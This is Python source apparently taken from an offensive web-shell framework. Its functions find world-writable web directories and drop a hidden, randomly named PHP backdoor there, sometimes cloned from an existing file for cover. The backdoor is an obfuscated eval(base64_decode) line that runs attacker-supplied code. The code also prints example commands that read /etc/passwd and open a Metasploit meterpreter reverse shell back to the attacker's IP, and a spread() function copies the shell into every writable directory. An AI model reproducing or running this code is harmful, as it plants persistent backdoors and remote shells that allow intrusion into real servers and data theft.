def php(self, ip, ourIP):
wwwroot = linux.get_doc_root()
cmd = 'find {0} -depth -perm -0002 -type d | sort -R '.format(wwwroot)
folder = make_request.get_page_source(cmd)
if folder:
folder = folder[0]
cprint('\n[+] Found a writable directory: \'{1}\''.format(folder), 'green')
filename = '.' + ''.join(choice(string.ascii_letters + string.digits) for x in range(8)) + '.php'
cprint('[+] Filename: \'{1}\''.format(filename), 'green')
location = '{0}/{1}'.format(folder, filename)
cmd = 'find {0} -type f -print'.format(wwwroot)
files = make_request.get_page_source(cmd)
cprint('[i] Select a file to \'clone\' (or \'0\' to skip):', 'green')
cprint(' 0.) Don\'t close - create new', 'green')
path = []
c = 0
for file in files:
path.append(file)
c += 1
cprint('{0:2d}.) {1}'.format(c, file), 'green')
while True:
try:
clone = int(raw_input(colored('[>] Which file to use? [0-{0}: '.format(c))))
if 0 <= clone <= c:
break
except ValueError:
pass
if clone != 0:
cmd = 'cp -f {0} {1}'.format(path[int(clone) - 1], location)
make_request.get_page_source(cmd)
cprint('[+] Creating our \'evil\' file: \'{0}\''.format(location), 'green')
parameter = ''.join(choice(string.ascii_lowercase) for x in range(6))
casePayload = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'eval'))))
caseShell = choice(map(''.join, product(*((c.upper(), c.lower()) for c in 'php eval(base64_decode'))))
payload = "{0}($_GET['{1}'].';');".format(casePayload, parameter)
payloadEncoded = b64encode(payload).format(payload)
evilFile = "<?{0}(\"{1}\")); ?>".format(caseShell, payloadEncoded)
cmd = 'echo \'{0}\' >> \"{1}\"'.format(evilFile, location)
make_request.get_page_source(cmd)
cprint('[+] Done!', 'blue')
uri = folder[len(wwwroot):]
#>>> '/'.join('https://localhost/html/shell.php'.split('/', 3)[:3])
#'https://localhost'
url = '/'.join(getargs.url.split('/', 3)[:3])
example = """Example:
curl "{url}{uri}/{filename}?{parameter}=phpinfo()"
curl "{url}{uri}/{filename}?{parameter}=require(\'/etc/passwd\')"
curl "{url}{uri}/{filename}?{parameter}=system(\'/sbin/ifconfig\')"
msfcli exploit/unix/webapp/php_eval RHOST={url} RPORT=80 PHPURI={uri}/{filename}?{parameter}=\!CODE\! PAYLOAD=php/meterpreter/reverse_tcp LHOST={ourIP} LPORT=4444 E""".format(
url=url,
uri=uri,
filename=filename,
parameter=parameter,
ourIP=ourIP,)
cprint(example, 'green')
else:
cprint('\n[!] Unable to find a writable directory', 'red')
def writable(self):
cmd = "find {0} -depth -perm -0002 -type d".format(linux.get_doc_root())
self.writable = make_request.get_page_source(cmd)
if self.writable:
c = 1
for path in self.writable:
cprint('{0:2d}.) {1}'.format(c, path), 'green')
c += 1
else:
cprint('\n[!] Didn\'t find any wriable directories', 'red')
def spread(self):
provided_shell_name = raw_input(colored('\n[?] Current shell name: ', 'green'))
shell_name = getargs.url.split('/')[-1] if getargs.method == 'post' else provided_shell_name
cmd = 'find {0} -depth -perm -0002 -type d | xargs -n 1 cp -v {1}'.format(linux.get_doc_root(), shell_name)
done = make_request.get_page_source(cmd)
if done:
success = '\n[+] {shell_name}{end} already written to {hot}{writable_length} paths'.format(
shell_name=shell_name,
writable_length=len(done))
success += '\n[+] To check these paths type @enum writable'
cprint(success, 'blue')
else:
cprint('\n[!] Something went wrong while spreading shell', 'red')
